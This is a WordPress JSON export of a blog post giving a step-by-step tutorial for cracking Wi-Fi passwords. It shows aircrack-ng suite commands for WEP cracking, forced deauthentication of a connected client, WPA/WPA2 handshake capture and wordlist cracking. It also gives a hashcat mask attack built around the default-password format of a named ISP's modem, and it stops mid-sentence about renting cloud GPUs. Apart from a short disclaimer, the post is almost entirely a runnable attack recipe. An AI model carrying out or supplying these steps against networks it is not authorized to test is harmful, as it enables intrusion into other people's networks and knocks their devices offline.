{"id":1140,"date":"2021-02-14T19:29:31","date_gmt":"2021-02-14T19:29:31","guid":{"rendered":"https:\/\/dft.wiki\/?p=1140"},"modified":"2021-04-10T01:49:15","modified_gmt":"2021-04-10T01:49:15","slug":"how-to-crack-wifi-wep-and-wpa-wpa2","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=1140","title":{"rendered":"How to Crack WIFI: WEP and WPA\/WPA2"},"content":{"rendered":"

This whole blog and including this post is just for educational purposes and do not do anything to a WIFI network that does not belong to you or that you have written permission to do so.<\/p>\n

Hacking WIFI with WEP encryption<\/strong> is very simple.<\/p>\n

First, listen for any WIFI running WEP nearby:<\/p>\n

airodump-ng wlan0 --encrypt wep<\/pre>\n
Replace the channel number (1<\/strong> in the example) and the MAC address (FF:FF:FF:FF:FF:FF<\/strong> in the example) with the data from airodump:<\/p>\n
basside-ng wlan0 -c 1 -b FF:FF:FF:FF:FF:FF<\/pre>\n
The preview command keeps capturing IV packages, which are the type of packages used to crack WEP. First, it does injection and then later it does flood.<\/p>\n
It is going to give you the hex version of the password, so use it to get the ASCII version of it:<\/p>\n
aircrack-ng .\/wep.pcap<\/pre>\n
Another way may take a bit longer because the is no packet injection to speed up the process, but works fine too.<\/p>\n
Once you know the channel and the BSSID (MAC of the router) you run the following commands in two different terminals:<\/p>\n
airodump-ng wlan0 -c 1 -b FF:FF:FF:FF:FF:FF\r\naircrack-ng .\/wep.pcap<\/pre>\n
Airodump will be capturing packets in one terminal while aircrack will be re-checking the file every 5000 packets until it gets enough information to crack the password.<\/p>\n
The basics about cracking a WIFI that uses WPA\/WPA2<\/strong> are capturing the 4-way handshake and use the acquired data into hashcat to recreate the password using brute force.<\/p>\n
To capture the handshake a device has to connect to the network, and this can be a long waiting process or maybe kick one device off and wait for it re-connect. Not a big deal!<\/p>\n
The hash cracking part is more critical because it can use a public passwords list, or another passwords list you created using tools like CUPP in combination or not with Mentalist.<\/p>\n
Changing the wireless adapter to monitor mode, check the mode changed, and start grabbing packages:<\/p>\n
sudo airmon-ng start wlan0\r\niwconfig\r\nsudo airodump-ng wlan0mon<\/pre>\n
The tool will do a channel hopping and will find out all the reachable routers and the devices connected to them.<\/p>\n
sudo airodump-ng -c1 -w output_file -d FF:FF:FF:FF:FF:FF wlan0mon<\/pre>\n
Note that -c1<\/strong> means channel 1 and FF:FF:FF:FF:FF:FF<\/strong> represents the MAC address of the desired router.<\/p>\n
Then in another terminal try to disconnect one of the clients.<\/p>\n
sudo aireplay-ng --deauth 0 -a FF:FF:FF:FF:FF:FF -c EE:EE:EE:EE:EE:EE wlan0mon<\/pre>\n
The first argument 0<\/strong> is the rate of the packets to be sent, -a<\/strong> is the access point, and -c<\/strong> is the client.<\/p>\n
On the airodump terminal, you may see at the top “WAP handshake: FF:FF:FF:FF:FF:FF<\/strong>“, which means the handshake was captured and the process can be stopped.<\/p>\n
sudo airmon-ng stop wlan0mon<\/pre>\n
If you open the output_file.pcap<\/strong> file with the Wireshark, filter by “eapol<\/strong>“, which stands for Extensible Authentication Protocol (EAP) over LAN, to see the 4-way handshake.<\/p>\n
Now use a wordlist to see if any of the words match with the password.<\/p>\n
aircrack-ng output_file.pcap -w \/usr\/share\/dict\/words<\/pre>\n
The wordlist above is just a dictionary and contains a very limited number of possibilities, consider using Rock You or creating the list yourself based on the information you have: SSID (can indicate the internet provider) and MAC (informs who manufactured the hardware) to guess the password pattern.<\/p>\n
For example, for Bell Canada, the modem Home Hub 3000 uses a password 12 characters long and each digit contains an upper-case hex (1-F).<\/p>\n
hashcat -m 2500 -a3 handshake.hccapx ?H?H?H?H?H?H?H?H?H?H?H?H<\/pre>\n
Don’t be disappointed if you find the estimated time o finish around 1800 years. Find a high-performance GPU, and face the challenge \ud83d\ude42<\/p>\n
\"\"<\/p>\n
Using Linode GPU computing to crack the password hash:<\/p>\n